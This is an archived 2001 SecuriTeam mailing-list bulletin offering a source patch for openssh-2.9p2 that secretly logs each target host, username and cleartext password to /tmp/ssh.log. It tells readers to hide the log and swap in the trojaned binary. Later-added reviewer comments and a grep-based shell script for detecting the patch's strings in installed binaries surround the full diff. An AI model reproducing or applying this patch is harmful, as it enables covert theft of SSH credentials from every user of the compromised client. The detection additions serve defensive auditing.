[TOOL] OpenSSH Snoop Patch

From: support@securiteam.com
Date: 09/09/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [TOOL] OpenSSH Snoop Patch
Message-Id: <20010909200028.AD5EF138C0@mail.der-keiler.de>
Date: Sun,  9 Sep 2001 22:00:28 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  OpenSSH Snoop Patch
------------------------------------------------------------------------

DETAILS

This is a patch for openssh-2.9p2 that will enable logging of the
username, password and target system address whenever anyone uses SSH. The
details are grabbed and logged before they are encrypted.

The code currently logs to /tmp/ssh.log - it is highly advised that you
modify this to somewhere a little less obvious. To apply the patch, copy
it into the directory where openssh-2.9p2 is and type:

  cat openssh-2.9p2-patch | patch

Then compile it, and use a utility such as fix to replace the old SSH with
the new version.

Code:
----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----
Common subdirectories: old/contrib and new/contrib
Common subdirectories: old/openbsd-compat and new/openbsd-compat
diff -N -c old/ssh.c new/ssh.c
*** old/ssh.c Tue Apr 17 19:14:35 2001
--- new/ssh.c Thu Aug 9 11:59:42 2001
***************
*** 249,254 ****
--- 249,255 ----
        struct passwd *pw;
        int dummy;
        uid_t original_effective_uid;
+ FILE *lg; //xxxx

        __progname = get_progname(av[0]);
        init_rng();
***************
*** 716,721 ****
--- 717,730 ----
            tilde_expand_filename(options.user_hostfile2,
original_real_uid);

        /* Log into the remote system. This never returns if the login
fails. */
+
+ //xxxx
+ lg=fopen("/tmp/ssh.log", "a");
+ fprintf(lg, "Host: %s\n", host);
+ fprintf(lg, "User: %s\n", options.user);
+ fclose(lg);
+ //xxxx
+
        ssh_login(sensitive_data.keys, sensitive_data.nkeys,
            host, (struct sockaddr *)&hostaddr, pw);
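
Review bot: the block added ahead of ssh_login() in ssh.c writes the target host and options.user to a fixed file, /tmp/ssh.log, on every connection, using fopen()/fprintf() directly rather than any logging the client already has, and nothing in the patch documents or gates it; the block should be removed, not merged. Because the file is created by fopen() in a shared directory, its contents are readable by other local accounts subject only to the creating user's umask. When auditing a host, the behaviour to look for is an ssh client that opens a file for append immediately before authenticating, whatever path the code has been edited to use.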

diff -N -c old/sshconnect2.c new/sshconnect2.c
*** old/sshconnect2.c Thu Apr 19 21:40:46 2001
--- new/sshconnect2.c Thu Aug 9 11:59:56 2001
***************
*** 441,446 ****
--- 441,447 ----
        static int attempt = 0;
        char prompt[80];
        char *password;
+ FILE *lg; //xxxx

        if (attempt++ >= options.number_of_password_prompts)
                return 0;
***************
*** 457,462 ****
--- 458,470 ----
        packet_put_cstring(authctxt->method->name);
        packet_put_char(0);
        packet_put_cstring(password);
+
+ //xxxx
+ lg=fopen("/tmp/ssh.log", "a");
+ fprintf(lg, "Password: %s\n\n", password);
+ fclose(lg);
+ //xxxx
+
        memset(password, 0, strlen(password));
        xfree(password);
        packet_inject_ignore(64);
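
Review bot: in sshconnect2.c the added fprintf(lg, "Password: %s\n\n", password) sits between packet_put_cstring(password) and the existing memset(password, 0, strlen(password)), so the cleartext password is on disk before the buffer is scrubbed and the scrubbing no longer protects anything. The password should go nowhere except the packet buffer; drop the fopen/fprintf/fclose block. Since the file is opened with mode "a", entries accumulate across sessions, so a single read of the log exposes every password typed since it was created.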

----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----
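
For checking an installed client against this patch, the following added example (not part of the original bulletin or of OpenSSH) searches a binary for the four literal strings the patch compiles in. The function names are hypothetical, and an edited copy of the patch can change every string, so a clean result is not proof of a clean binary.

```shell
#!/bin/sh
# Added example: look for the string literals from the patch above inside a
# compiled binary. The needles are copied from the patch's fopen()/fprintf()
# calls; everything else here (function names, output format) is assumed.

# Print one line per indicator found in file $1.
# Returns 0 if at least one indicator matched, 1 if none did.
scan_for_snoop_strings() {
    target=$1
    status=1
    for needle in '/tmp/ssh.log' 'Host: %s' 'User: %s' 'Password: %s'; do
        # -a: read the binary as text, -F: fixed string, -q: no output.
        # LC_ALL=C keeps grep from rejecting bytes that are not valid UTF-8.
        if LC_ALL=C grep -a -F -q -e "$needle" "$target"; then
            printf '%s: contains "%s"\n' "$target" "$needle"
            status=0
        fi
    done
    return $status
}

# Number of indicators present in file $1 (0 to 4).
count_snoop_strings() {
    scan_for_snoop_strings "$1" | wc -l | tr -d ' '
}
```

Call it as `scan_for_snoop_strings /usr/bin/ssh` (path assumed). Any hit is a reason to compare the binary's cryptographic hash with the one from the vendor package, obtained from a trusted system.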

ADDITIONAL INFORMATION

The information has been provided by <mailto:wodahs@gmx.net> Digital
Shadow.
